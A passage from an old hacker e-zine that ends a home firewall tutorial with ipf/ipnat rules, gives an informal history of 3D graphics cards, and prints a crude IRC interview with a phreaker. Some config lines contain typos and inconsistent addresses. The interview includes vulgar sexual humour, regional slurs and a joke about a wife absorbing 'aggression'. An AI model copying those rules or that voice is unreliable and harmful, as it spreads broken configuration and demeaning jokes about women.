pass in quick on tun0 proto icmp all icmp-type 3
pass in quick on tun0 proto icmp all icmp-type 11

# allow all access from internal interface
pass in quick on ne3 192.168.0.0/16 to any

# allow outside access to http, ssh and mail
pass in quick on tun0 from any to an port = 80 flags S/SA
pass in quick on tun0 from any to any port = 22 flags S/SA
pass in quick on tun0 from any to any port = 25 flags S/SA

# allow DNS from my optus nameservers
pass in on tun0 proto udp from 203.2.75.2 port = 53 to any
pass in on tun0 proto udp from 203.2.75.12 port = 53 to any

# let outgoing traffic out
pass out quick on tun0 proto tcp from any to any flags S keep state
pass out quick on tun0 proto udp from any to any keep state
pass out quick on tun0 proto icmp from any to any keep state

# block all by default
block in log quick on tun0 any to any

# end ruleset
:
: If any packet doesn't fit into one of these rules, then it is dumped
: and logged. There are rules to politely reject connections etc, but
: dont bother. The 'log' option is handy for those why are paranoid out
: there. As you can see you can tell ipf alot of information. Which port,
: what protocol, what adress, etc.. Once thats all added to /etc/ipf.rules,
: restart ipf. You can check if your rules are inplace by typing:
:
: ipfstat -io
:
: Which will display the current active rules.
:
: ->> /etc/ipnat.rules
: This file is alot smaller then ipf.rules, merely because there is not
: much to configure.
:
# Reference:
# tun0 = ppp interface to internet
# 0/32 = if your ip is dynamic, otherwise put your ip here.
# 192.168.0.* = internal network

# ipnat ruleset
# port map
map tun0 192.168.0.0/24 -> 0/32 portmap tcp/udp 1025><65000

# handle ICMP, etc.
map tun0 192.168.0.0/24 -> 0/32

# This will make ipnat act as a proxy for active FTP sessions
map tun0 192.168.0.0/24 -> 0/32 proxy port ftp ftp/tcp

# end ruleset
:
: Here you see only 3 lines, one to map ports, one to handle all other
: things, and one for a transperent ftp proxy. I should also mention
: that if you want to redirect connection attempts because, for example,
: you host your small website off a server machine on your internal
: network add a derivative of the following line into /etc/ipnat.rules:
:
: rdr tun0 192.168.0.1 port 80 -> 192.168.1.2 port 8080
:
: Where 192.168.0.1 is the firewall, and 192.168.0.2 is the webserver.
: This will map port 80 on the external (tun0) interface on your
: firewall to port 8080 on the server located on your network at
: 192.168.1.2. The last thing that needs to be done is to run 'ipf -y'
: everytime you get allocated a new ip address. You can do this manualy
: OR by adding 'bg ipf -y' to your /etc/ppp/ppp.conf script /inside/ your
: settings for your ISP.
:
: ->> outro
: Thats all the basics you'll need to know. If you really want to protect
: your data go with the most secure setup.. unplug the computer from any
: network. Even z3r0c00l can't transmit packets over thin air. For the
: average user, this sort of setup will be good enough.
:
: -aphex -http://pulsewidth.net
:
:....
:
...[ ]........................................................................
: :
: #08 History of 3d acceleration - Maticles :
: ---------------------------- :
:.[_]........................................................................:
:
...:
:
: Introduction
:
: 'llo - 'tis I Mat(icles if you prefer) - I used to common on #infosurge,
: but got bored, and now Damien has me looked up in his closet treating
: me like a monkey and has me writing a 'History of 3d acceleration'
: review. Woohoo. 3d cards primarily surfaced late 1995 with the advent
: of 3dfx's Voodoo. I must admit, professinal machines such as the Silicon
: Graphics Onyx did have 3d acceleration, but you'd be paying $15000 US
: for the privledge of owning such a card.
:
: About the first 3d comsumer accelerator - 3Dfx's 'Voodoo Graphics Chip'
:
: The first 3d accelerator came from the Silicon Valley start up company,
: 3Dfx Interactive, who developed the Voodoo based chip. The Voodoo
: generally had a hand blistering 4mb of onboard memory (Compared to 32mb
: and 64mb of todays standards) and had features such as accelerated MIP
: mapping and alpha transparencies. I bought such the beast in 1996 (or
: maybe it was 1997, I forget) for a whopping $210 which was expensive for
: a video card in those days, it was a yum-cha Atrend Helios. It allowed
: whooping detail on games such as Need For Speed 2:SE and GLQuake, both
: of which looked so err.. 'life like' it was scary. There were 'cool'
: things such as alpha-blended fog, fancy-dan textures and the whole thing
: just looked so schmick over its 2d variant.
:
: How the whole thing turned into a race.
:
: nVidia had just surfaced with its Riva 128, Rendition with its PowerVR,
: Matrox with the Mystique and a few other non-starters. This gave
: serious competition in the DirectX segment, but with 3Dfx Interactive
: holding the rights to glide, these chips didn't hold much of a chance,
: until Microsoft. Microsoft got its act together and released Direct3d,
: which was easier to code then glide, and it would run on alot more
: systems, seeing as all of the 3d accelerators were Direct3d compliant.
: THis got developers interested, so they started to code in Direct3d. (Some
: were cunning enough to do Direct3d and glide - glide was ALOT faster on
: voodoo then Direct3d on the voodoo) Things were going well for nVidia,
: Rendition and Matrox with their cards, finding a nice little place in
: the market. Then 3Dfx made a return.
:
: 3Dfx's next plan.
:
: 3Dfx released the Voodoo2 chipset, which was capable in running in SLI. A
: little more on SLI later. The power of 2 'Voodoo 2' was simply awesome to
: put it in 2 words. The frame rate was a astonishing 40fps at 640x480 in
: games such as Foresaken or Turok, this was simply unheard of in the past.
: Others chipset makers (nVidia, Matrox and newcomers to the 3D market, S3
: and ATi) created new cards also, but after 3Dfx has made a nice profit.
: Unfortunately Rendition basically stalled at the starting line, and failed
: to bring out a 3rd revision of PowerVR (2nd being PowerVR PCX2). S3 had
: just started with the Savage 3d and the Virge series. Virge really
: sucked in 3d, as did Savage 3d, so we won't speak about them much,
: as they weren't particully ground-breaking products. ATi released the
: rage which ended up being a massive success in OEM's and laptops because
: of their cheapness, and they were alright for 3d applications. All these
: cards on the markets from various companies started a 3d accelerator war,
: which meant new features came in place. Bit more after this...
:
: SLI
:
: SLI was 3Dfx's main feature in the Voodoo 2's. SLI means Scan Line
: Interleave which basically is 1 'Voodoo 2' card is doing 1 line, which
: the other is doing the line under, as such:
:
: ----^^^^^^-- <-- 'Voodoo 2' card number 1
: ----.----.-- <-- 'Voodoo 2' card number 2
: ------->---- <-- 'Voodoo 2' card number 1
: ------------ <-- 'Voodoo 2' card number 2
: ----\\____/-- <-- 'Voodoo 2' card number 1
:
: And so forth. This allowed the speed to be basically doubled.
:
: The after effects of the first 3D war.
:
: After this came nVidias TNT and TNT2, Matrox's G200 and 3Dfx's Voodoo3 as
: the major contenders. The Voodoo3 this time was alot worse then the TNT
: and TNT2 because it was being held back by 16-bit. Bad 3Dfx. Bad. 16-bit
: sucks, it looks washed out and grainy, believe me, get a TNT/2 or Geforce
: offering and see, much yumness in 32-bit indeed. This section is rather
: boring as its much the same as the first war, so I'll get to todays
: technologies.
:
: What yummy goodness we have today
:
: 3Dfx is dead. Yes, nVidia own them now, goto www.3dfx.com if you must.
: The Voodoo4/5 was released way after schedule, therefore it just didn't
: work. Geforce 2 Ultra are now out, although expensive. For the same
: price as a Voodoo5 you can get the Geforce2 Pro, which looks better in
: my opinion and has faster FPS. Shh you Voodoo people, noone cares about
: 'Full-Screen Anti-Aliasing' the Geforce 2 series (Not MX thou) can do
: it easily with a frame loss, but not enough for it to be jerky. Anyway,
: Voodoo 5 have the SLI technology also, with the Voodoo 5 board (Now being
: manufactured by 3Dfx's arm, STB [or something]), but even with this,
: it doesn't beat the Geforce 2. The Voodoo 4, meant to be in competition
: with the Geforce 2 MX, looks better competing ith a TNT 2 Ultra, it just
: can't keep up with the Geforce 2 MX. Whats so special about this Geforce
: I hear you ask? Well, the Geforce is so special because it has a GPU,
: Graphics Processing Unit, therefore the CPU doesn't have to do transform
: and lighting effects, this meants the CPU has more time for AI and other
: features. The Voodoo 5 doesn't have a GPU, .: it sucks. :)
:
: I'll name the variants on the Geforce series: (In order of release) Geforce
: 256 - nVidias first Geforce, sold alot. Geforce DDR - A Geforce 256,
: but has DDR (Double Data Rate) so it operates twice per ram clock-cycle.
: Geforce 2 GTS - Geforce 256, but with 4 pipelines for textures, DDR ram,
: fast core, it just means more yummyness! - oh, it also has the nVidia
: Shader Rasterizer which means shadows look even more shadowy! Woohoo!
: Geforce 2 MX - The 'home office' version of the Geforce 2 GTS, has slower
: SDRAM, but is still 33% faster then the Geforce 256. Geforce 2 Ultra -
: Man. This one rocks. The speed is simply awesome, 1600x1200, ABSOLUTLY
: everything high in Quake 3 with 4x FSAA, and its still not jerky. It
: rocks, trust me. Geforce 2 Pro - A Geforce 2 GTS, but with faster RAM.
: Geforce 2 Go! - The Geforce 2 GTS, but with some nifty power saving stuff
: so it can run in laptops without draining the battery in 0.39 seconds.
:
: ATi has made a comeback with the Radeon, which apparently (never seen one
: going) looks as good as a Geforce 2 and slightly slower, but still has
: better drivers etc. But still, I'm yet to see one actully going. I'll
: update this in Infosurge 9.
:
: Whats to come.
:
: Well, with 3Dfx gone, its up to nVidia and ATi. S3 are gone, they're now
: Sonic Blue, who do other - non-interesting stuff. Rendition are gone in my
: opinion. So, nVidia and ATi, lets have a look. nVidia is releasing the
: 'NV20' (only a codename) which is spectilated to be 7 times faster then
: the Geforce 2 Ultra, I don't believe it, and think its just a rumour,
: plus, its also rumoured to cost AU$1400, but nothing official is available
: on it. ATi is also making the Radeon 2 (spectilation again) with a core
: twice as fast as the current one. I'll post up what I heard in Infosurge 9.
:
: Oooh, Damien has brought me dinner, is that light? Yes! I see daylight,
: but it hurts my pail closet skin.
:
: Ta ta Folks, until next time.
:
:....
:
...[ ]........................................................................
: :
: #?? Interview with a vampi..... uhhh, irc loser - Fleabag :
: --------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: <Fleabag> Evening phase5, thank you for taking time out of your busy
: lifestyle of drinking alone and masturbating to let me interview you.
: <zak> im not taking time out
: <zak> im doing both those things
: <zak> as we speak
: <Fleabag> Shall we get this baby rocking? Lets...
:
: <Fleabag> How did you get into phreaking?
: <zak> umm
: <zak> when i was a kid
: <zak> possibly as soon as i was born
: <zak> my family bought
: <zak> or had previously owned a phone
: <zak> it grew from their i guess
:
: <Fleabag> Have you ever had a homosexual experience?
: <zak> i thought we weren't going to go into this
: <zak> i dont give permission for my face to be on camera
: <zak> i want it blurred
: <zak> blurred
: <zak> !
:
: <Fleabag> Have you ever patted a monkey?
: <zak> yes
: <zak> often
: <Fleabag> I like monkeys.
: <zak> i like my monkey
: <zak> tho sometimes i have to beat it
: <zak> more and more often i have to beat my monkey
:
: <Fleabag> Whats your favourite band?
: <zak> hmm... band
: <zak> that's a tough question
: <Fleabag> Just answer it.
: <zak> i really like that royal crown revue band
: <zak> they make good music
: <zak> whenever im down i can listen to it
: <zak> and laugh my arse off at their shitness
: <zak> so the answer is red hot chili peppers
:
: <Fleabag> Are you single? Uhhh, you don't have to bother answering that
: one....
: <zak> moving on...
:
: <Fleabag> Do you think the au phreaking scene is dead?
: <zak> in a way
: <zak> there isn't really much new innovation
: <zak> im just in it for the groupie chicks
: <Fleabag> Aren't we all?
: <zak> as you can tell, its working
:
: <Fleabag> Favorite zine? (Besides infosurge?)
: <zak> umm
: <zak> let me think for a bit
: <zak> actually, i have to go for a piss
: <zak> back in a few
: <Fleabag> Okay, I'm going to get another beer.
: <Fleabag> Damn phase, does it always take you that long to piss?
: (Seriously, its been over 10 minutes)
: <Fleabag> Maybe you should see a doctor?
: <zak> stfu
: <zak> umm.. no favourite really
: <zak> used to like um
: <zak> phrack, thtj, fk
: <zak> and the exploit-x issue 1
: <zak> was krad
: <Fleabag> So I heard...
: <zak> and what do you mean 'other than infosurge'?
: <zak> i wouldnt say that trash is my favourite
: <Fleabag> I'm asking the questions here.
:
: <Fleabag> If you could be any member of the infosurge crew, who would you
: be?
: <zak> that phase5 guy
: <zak> he's cool
: <zak> other than that
: <zak> i'd be k
: <zak> he puts the k in krad
: <Fleabag> We all want to be k.
:
: <Fleabag> Current hardware setup?
: <zak> umm hardware
: <zak> this computer
: <zak> the other one next to it
: <zak> the 2 386's i hide alcohol in
: <zak> the p166 i hide alcohol in
: <zak> umm
: <zak> the 386 is called woody
: <zak> and it has a can of woodstock in it
: <zak> thats irony
: <zak> or something similar to that
: <zak> got a dumb terminal as well
: <zak> and a phone shaped like a football
:
: <Fleabag> Who do you think I should interview next? And why?
: <zak> not lymco
: <zak> he's from perth
: <zak> all his answers will be
: <zak> 'yes i want to fuck my relatives'
: <zak> and
: <zak> 'no.. no electricity yet'
: <Fleabag> Whos the most interesting person you've ever met online?
: <zak> and 'fuck cant talk now. uncle jed needs me to backhoe the lawn
: <zak> herm
: <zak> slow down
: <zak> with the questions
: <Fleabag> stfu
: <zak> i like to rant
: <Fleabag> I'll do what I want, and I'll fix it up all neat and shit.
: <Fleabag> Rant away.
: <zak> ok
: <zak> pants
: <zak> why are they so important
: <zak> i dont wear them most of the time
: <zak> someone explain
: <Fleabag> Are you quite done?
: <zak> for now
:
: <Fleabag> Whos the most interesting person you've ever met online?
: <zak> umm, most interesting person
: <zak> i dont know
: <zak> your kind of a weirdo
: <zak> could be you
: <zak> coolest person i met online
: <zak> doesnt irc tho
: <zak> so that probably doesnt count
: <Fleabag> I asked for a name. Not your life story.
: <zak> i'll come back to it later
: <Fleabag> Okay..
:
: <Fleabag> If you could be any type of smell, what would you be and why?
: <zak> umm
: <zak> you know the smell of nutsaq?
: <zak> not that
: <zak> something to pickup chicks
: <zak> so the smell of a stollie
:
: <Fleabag> Favorite site?
: <zak> its a porn site
: <zak> so i'll give you second favourite
: <zak> i dont want everyone using its bandwidth
: <zak> oh shit, phone beeped
: <zak> wait up
: <zak> wtf
: <zak> thesefucks
: <zak> are messaging me
: <zak> calling me "jen"
: <zak> and saying we had a great night last night
: <zak> this is the second time
: <zak> in a week
: <zak> this has happened
: <zak> this is fucked
: <Fleabag> Do you really think the people reading IS care?
: <zak> thats not the fucking point
: <Fleabag> Just answer my questions and crawl back into your hole.
: <zak> what was the question again?
: <zak> oh
: <zak> www.theonion.com
:
: <Fleabag> If you could be a chick for one day, whats the first thing you
: would do?
: <zak> are you stealing questions
: <zak> from picturepoll.com
: <zak> thats fucking sad
: <zak> what kind of bullshit interview is this
: <Fleabag> No. I am not.
: <Fleabag> Answer the fucking question.
: <zak> if i was a chick for a day
: <zak> i'd marry myself
: <zak> so the next day
: <zak> i'd have achick
: <zak> to cook, clean and take my agression
:
: <Fleabag> Do you think I'm fat?
: <zak> in those pants? yes
:
: <Fleabag> Thoughts on Project K?
: <zak> project k demands bananas
:
: <Fleabag> Have you ever spoken to the devil?
: <zak> no
: <zak> he once felt me up on the bus tho
: <zak> but i ignored him
:
: <Fleabag> Ever woken up screaming 'Oh god, what happened to my penis?!!'?
: <zak> yes
: <zak> several times
:
: <Fleabag> Know where I can get some 0day pr0n action?
: <zak> www.thehun.net
: <zak> has 0hday
: <zak> i have others
: <zak> but i dont give out my secrets
: <Fleabag> phase5 thanks for you time, I'll ask you one more question...
: <zak> ok
:
: <Fleabag> I haven't got anywhere to stay tonight, reckon I could crash at
: your place?
: <zak> im sleeping at the park tonight. you're welcome to join me
: <Fleabag> Thank you phase5. Your thoughts will forever live on in
: infosurge8....... you fucking sad little weirdo...
: <zak> guess what
: <Fleabag> What?
: <zak> im removing your midget monkey article from is7
: <zak> you fuck
: <Fleabag> I hate you.
: <zak> eric?
: <zak> is that you?
: <Fleabag> Pablo?
: <zak> yes
: <zak> its me
: <Fleabag> One more thing zak....
: <zak> yes?
: <Fleabag> <zak> i'll come back to it later
: <Fleabag> The people deserve to know.
: <zak> what was the question?
: <Fleabag> Whos the most interesting person you've ever met online?
: <zak> there's no-one really
: <zak> that stands out as really interesting
: <zak> not on irc anyway
: <Fleabag> You said you come back to it, the coolest person.
: <zak> coolest?
: <zak> me
: <Fleabag> Stop being a tight fuck, its your fucking zine, name names.
: <zak> OK FUCK
: <zak> LOOK
: <zak> NO ONE IS FUCKING INTERESTING
: <zak> YOUR NOT COOL
: <zak> YOUR SAD FUCKS WITH NO LIVES
: <zak> i have met one krad person on icq tho
: <Fleabag> Who was?
: <zak> and here ends interview
: <Fleabag> Shit, you really are an alco huh? Please note, phase is hanging to
: get to the park to drink alone.
: <zak> fucking yes
: <zak> its 12:00
: <zak> i want to go
: <zak> spend time with jim
: <zak> my friend
: <zak> leave me alone
: <zak> blur my fucking face
: <zak> blur it
:
: -In conclusion-
:
: phase5 is a creepy little man. Hes the type of person if you saw walking
: towards you on the street, you'd cross the road to avoid him. His past times
: include, drinking alone in parks, abusing women and masturbating over old
: #phreak logs. He has a habit of asking people for money and soiled panties.
: Once upon a time, there was a guy who went well at school, knew the secrets
: of au phreaking, now stands a dirty pervert who spends whatever money he
: makes on alcohol. On the Fleabag Human Rating System (TM) I give phase5
: 3/10. All three points are for jokes made about lymcos mother that I
: found somewhat amusing.
:
: Fleabag. 8/12/00
:
:.....................................................
:
:
[ ]
e o f

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT